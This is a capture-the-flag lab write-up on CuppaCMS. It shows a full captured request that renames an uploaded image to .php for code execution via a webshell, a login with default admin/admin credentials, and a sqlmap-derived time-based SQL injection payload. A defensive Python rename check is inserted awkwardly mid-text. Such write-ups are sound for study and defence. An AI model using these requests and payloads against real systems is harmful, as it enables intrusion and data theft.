Introduction
CuppaCMS is a content management system (CMS). CuppaCMS versions before 2019-11-12 contain a security vulnerability: an attacker can upload a malicious file under an image extension and then, with a crafted request to the rename function provided by the file manager, change the image extension to PHP, which leads to remote arbitrary code execution.
A SQL injection also exists under the /components/table_manager/ path.
Steps
Open the lab target.
Log in to the admin backend with the weak credentials admin/admin.
Locate the file-upload feature, which only allows image uploads. After uploading, rename the file to a .php extension and intercept the request. The captured request is as follows:
POST /js/filemanager/api/index.php HTTP/1.1
Host: eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com/js/filemanager/index.php
Content-Type: application/json
Content-Length: 59
Origin: http://eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1718849866,1718896116,1719242501,1719395363; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=688e0a110412c17b0a7e0a5ad4cdf894cf99798b; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1719395439; country=us; language=en; PHPSESSID=0rvs895vqjskasibtukhf8m0a2; administrator_path=http%3A%2F%2Feci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com%2F; administrator_document_path=%2F
Priority: u=1

{"from":"//asd.php.png","to":"//asd.php","action":"rename"}
Forward the modified request. After the rename succeeds, the .htaccess file has to be deleted, and then AntSword is used to connect, which yields flag{047b0831-949e-41f3-84f1-49859eb6bebf}.
Additional findings
During testing, a SQL injection vulnerability was also found.
Go to Permissions-Group, run a search in the search box and intercept the request. The captured request is as follows:
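The root cause above is a rename action that trusts the caller's target name. The following server-side gate is an added example written for this write-up (Python rather than CuppaCMS's own PHP, and not the project's code); the upload root, the extension allowlist and the forbidden names are constructed values for the example. It rejects renames that leave the upload directory, end in a non-image extension, carry an executable segment anywhere in the name (asd.php.png), or target server configuration files such as .htaccess.

```python
import posixpath
import re

# Constructed values for this example; a real deployment would load them from config.
UPLOAD_ROOT = "/media/uploads"
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "webp"}
# Names that must never be written regardless of extension (they change server behaviour).
FORBIDDEN_BASENAMES = {".htaccess", ".htpasswd", ".user.ini", "web.config"}
# Segments that a handler could still execute when they appear before the final
# extension, e.g. "shell.php.png" under Apache AddHandler-style configuration.
EXECUTABLE_SEGMENTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "cgi", "pl", "py"}


def normalize_path(root, user_path):
    """Join a user-supplied path onto the root and return None if it escapes it."""
    # Collapse "..", "//" and "./" before comparing against the root.
    candidate = posixpath.normpath(posixpath.join(root, user_path.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def check_rename(src, dst, root=UPLOAD_ROOT):
    """Return (ok, reason); ok is True only when the renamed file stays inert."""
    if normalize_path(root, src) is None or normalize_path(root, dst) is None:
        return False, "path escapes upload root"
    name = posixpath.basename(normalize_path(root, dst))
    if not name or name.lower() in FORBIDDEN_BASENAMES:
        return False, "forbidden file name"
    if not re.fullmatch(r"[A-Za-z0-9._-]+", name):
        return False, "disallowed characters in file name"
    segments = name.lower().split(".")
    if len(segments) < 2 or segments[-1] not in ALLOWED_EXTENSIONS:
        return False, "extension not in allowlist"
    # Reject double extensions such as "x.php.png" or "x.phtml.jpg".
    if any(seg in EXECUTABLE_SEGMENTS for seg in segments[1:-1]):
        return False, "executable segment in file name"
    return True, "ok"


def handle_rename_request(body):
    """Gate a JSON body of the form {"from": ..., "to": ..., "action": "rename"}."""
    if body.get("action") != "rename":
        return False, "unsupported action"
    return check_rename(str(body.get("from", "")), str(body.get("to", "")))


if __name__ == "__main__":
    # The request from the write-up is rejected at the extension check.
    print(handle_rename_request({"from": "//asd.php.png", "to": "//asd.php", "action": "rename"}))
```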
POST /components/table_manager/ HTTP/1.1
Host: eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 150
Origin: http://eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com/
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1718849866,1718896116,1719242501,1719395363; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=688e0a110412c17b0a7e0a5ad4cdf894cf99798b; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1719395439; country=us; language=en; PHPSESSID=0rvs895vqjskasibtukhf8m0a2; administrator_path=http%3A%2F%2Feci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com%2F; administrator_document_path=%2F
Priority: u=1

search_word=123&filter_language=&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_menus&uniqueClass=wrapper_content_897880

Feed the request to sqlmap.
The resulting payload:
search_word=123&filter_language=' AND (SELECT 5543 FROM (SELECT(SLEEP(5)))JJri) AND 'XiZL'='XiZL&order_by=id&order_orientation=ASC&path=component/table_manager/view/cu_menus&uniqueClass=wrapper_content_897880
The databases and then the tables were dumped; no flag was found there, so testing stopped at that point.